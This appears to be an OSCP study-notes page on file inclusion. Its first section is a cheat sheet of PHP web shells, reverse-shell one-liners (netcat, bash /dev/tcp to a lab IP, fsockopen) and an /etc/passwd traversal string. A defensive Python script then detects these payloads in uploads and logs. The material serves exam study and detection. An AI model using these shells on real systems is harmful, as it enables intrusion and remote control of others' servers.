oscp-study-notes

LFI/RFI


Last updated 4 years ago


Pentestmonkey's PHP reverse shell: /usr/share/webshells/php/php-reverse-shell.php

<?php echo shell_exec("nc $TARGET_IP -e /bin/sh") ?>
<?php echo system($_GET["cmd"]);?>
<?php echo shell_exec($_GET["cmd"]);?>

Reverse TCP shell without netcat

<?php echo shell_exec('/bin/bash -i >& /dev/tcp/10.11.0.98/443 0>&1');?>
<?php $sock=fsockopen("127.0.0.1",1337); exec("/bin/sh -i <&3 >&3 2>&3");?>
../../../../../../../../../etc/passwd

Notes

  • Some versions of netcat do not support the -e flag
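
A defender-side view of the payloads above, as an added example that is not part of the original notes: a Python triage script that flags the same shapes in uploaded PHP files and in web access logs. The rule names, function names and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Rules mirror the payload shapes listed on this page; rule names are hypothetical.
SOURCE_RULES = {
    "exec-of-request-input": re.compile(
        r"\b(?:shell_exec|system|exec|passthru)\s*\(\s*\$_(?:GET|POST|REQUEST)\b"),
    "bash-dev-tcp-redirect": re.compile(r"/dev/tcp/[\w.\-]+/\d+"),
    "netcat-exec-flag": re.compile(r"\bnc\b[^;\n]*\s-e\s"),
    "fsockopen-plus-shell": re.compile(
        r"fsockopen\s*\(.*\b(?:exec|system|shell_exec)\s*\(", re.S),
}
REQUEST_RULES = {
    "path-traversal": re.compile(r"(?:\.\./){2,}"),
    "sensitive-file": re.compile(r"/etc/passwd\b"),
    "cmd-parameter": re.compile(r"[?&]cmd="),  # noisy alone; treat as a triage hint
}
REQUEST_LINE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def scan_php_source(text):
    """Return the names of source rules that match a PHP file's contents."""
    return sorted(n for n, rx in SOURCE_RULES.items() if rx.search(text))

def scan_request(uri):
    """Return request rules matching a URI, decoding twice to catch %252f."""
    decoded = unquote(unquote(uri))
    return sorted(n for n, rx in REQUEST_RULES.items() if rx.search(decoded))

def triage_access_log(lines):
    """Return (uri, hits) for every log line whose request matches a rule."""
    findings = []
    for line in lines:
        m = REQUEST_LINE.search(line)
        if m and (hits := scan_request(m.group(1))):
            findings.append((m.group(1), hits))
    return findings

# Constructed sample input (not real traffic; addresses are documentation range).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php?page=about HTTP/1.1" 200 512',
    '203.0.113.7 - - [01/Jan/2024:10:00:05 +0000] "GET /index.php?page=..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1" 200 1843',
    '203.0.113.7 - - [01/Jan/2024:10:00:09 +0000] "GET /uploads/img.php?cmd=id HTTP/1.1" 200 54',
]
SAMPLE_UPLOAD = '<?php echo shell_exec($_GET["cmd"]);?>'

if __name__ == "__main__":
    print(scan_php_source(SAMPLE_UPLOAD))
    for uri, hits in triage_access_log(SAMPLE_LOG):
        print(hits, uri)
```

A 200 response with an unusually large body on a traversal hit, as in the second sample line, is the case to escalate first.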

References

https://awakened1712.github.io/oscp/oscp-lfi-rfi/